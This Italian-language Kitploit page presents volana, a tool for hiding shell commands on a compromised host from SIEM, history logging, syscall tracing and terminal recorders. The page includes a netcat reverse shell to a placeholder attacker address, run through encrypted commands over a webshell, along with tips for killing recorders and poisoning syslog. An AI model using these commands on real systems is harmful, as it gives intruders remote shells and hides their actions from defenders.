Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
volana — 🌒 Offuscamento dei comandi shell per evitare i sistemi di rilevamento | Kitploit
Strumenti/GitHubGitHub/ariary/volana
ExploitEvasione IDS/IPSShellcodePenetration TestingCommand and ControlRed Teaming
GitHubariary/volana

volana

🌒 Offuscamento dei comandi shell per evitare i sistemi di rilevamento

Vedi Repository
12093 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

volana (luna in malgascio)

root@kitploit:~
{ Usalo ; 🌚(nascondi da); 🌞(rilevato da) } 

Offuscamento dei comandi shell per evitare SIEM/sistemi di rilevamento

Durante un pentest, un aspetto importante è essere furtivi. Per questo motivo dovresti cancellare le tue tracce dopo il tuo passaggio. Tuttavia, molte infrastrutture registrano i comandi e li inviano a un SIEM in tempo reale, rendendo inutile la sola pulizia successiva.

volana fornisce un modo semplice per nascondere i comandi eseguiti sulla macchina compromessa, fornendo il proprio runtime shell (inserisci il comando, volana lo esegue per te). In questo modo cancelli le tue tracce DURANTE il tuo passaggio

Usage

Devi ottenere una shell interattiva. (Trova un modo per lanciarla, sei un hacker, è il tuo lavoro! altrimenti). Poi scaricala sulla macchina di destinazione ed eseguila. Questo è tutto, ora puoi digitare il comando che vuoi eseguire in modo furtivo

root@kitploit:~
## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

## Execute it
./volana

## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1  #you are allowed to be a bit cocky
volana » [command]

Parole chiave per la console volana:

  • ring: abilita la modalità anello, cioè ogni comando viene lanciato insieme a molti altri per coprire le tracce (da soluzioni che monitorano le system call)
  • exit: esci dalla console volana

da shell non interattiva

Immagina di avere una shell non interattiva (webshell o RCE cieca), puoi usare i sottocomandi encrypt e decrypt. In precedenza, devi compilare volana con una chiave di crittografia incorporata.

Sulla macchina dell'attaccante

root@kitploit:~
## Build volana with encryption key
make build.volana-with-encryption

## Transfer it on TARGET (the unique detectable command)
## [...]

## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND

Copia il comando crittografato ed eseguilo con la tua RCE sulla macchina di destinazione

root@kitploit:~
./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)

Perché non nascondere semplicemente il comando con echo [command] | base64 ? E decodifica sul target con echo [encoded_command] | base64 -d | bash

Perché vogliamo essere protetti contro i sistemi che attivano un alert per l'uso di base64 o che cercano testo base64 nei comandi. Inoltre vogliamo rendere difficile l'indagine e base64 non è un vero freno.

Rilevamento

Tieni presente che volana non è un miracolo che ti renderà completamente invisibile. Il suo scopo è rendere più difficile il rilevamento delle intrusioni e l'indagine.

Per rilevato intendiamo se siamo in grado di attivare un alert se un determinato comando è stato eseguito.

Nascondi da

Verrà catturata solo la riga di comando di lancio di volana. 🧠 Tuttavia, aggiungendo uno spazio prima di eseguirlo, il comportamento predefinito di bash è di non salvarlo

  • Sistemi di rilevamento basati sull'output del comando history
  • Sistemi di rilevamento basati sui file di history
    • .bash_history, ".zsh_history" ecc...
  • Sistemi di rilevamento basati sui trap di debug di bash
  • Sistemi di rilevamento basati sul sistema di logging integrato di sudo
  • Sistemi di rilevamento che tracciano tutte le syscall dei processi a livello di sistema (es. opensnoop)
  • Registratori di terminale (tty) (script, screen -L, sexonthebash, ovh-ttyrec, ecc..)
    • Facile da rilevare ed evitare: pkill -9 script
    • Non è un caso comune
    • screen è un po' più difficile da evitare, tuttavia non registra l'input (input segreto: stty -echo => evita)
    • Il rilevamento dei comandi potrebbe essere evitato con volana con crittografia

Visibile per

  • Sistemi di rilevamento che hanno un alert per comandi sconosciuti (quello di volana)
  • Sistemi di rilevamento basati su keylogger
    • Facile da evitare: copia/incolla comandi
    • Non è un caso comune
  • Sistemi di rilevamento basati sui file syslog (es. /var/log/auth.log)
    • Solo per comandi sudo o su
    • Il file syslog potrebbe essere modificato e quindi avvelenato a piacere (ad es. per /var/log/auth.log:logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
  • Sistemi di rilevamento basati su syscall (es. auditd, LKML/eBPF)
    • Difficili da analizzare, possono essere resi illeggibili effettuando diverse syscall di diversione
  • Iniezione personalizzata di LD_PRELOAD per creare log
    • Non è affatto un caso comune

Bug bounty

Scusa per il titolo clickbait, ma non verranno forniti soldi per i contributori. 🐛

Fammi sapere se hai trovato:

  • un modo per rilevare volana
  • un modo per spiare la console che non rileva i comandi di volana
  • un modo per evitare un sistema di rilevamento

Segnala qui

Crediti

  • 8 modi per spiare la console
  • moonwalk: strumento simile che cancella le tracce DOPO il passaggio
Scarica lo strumento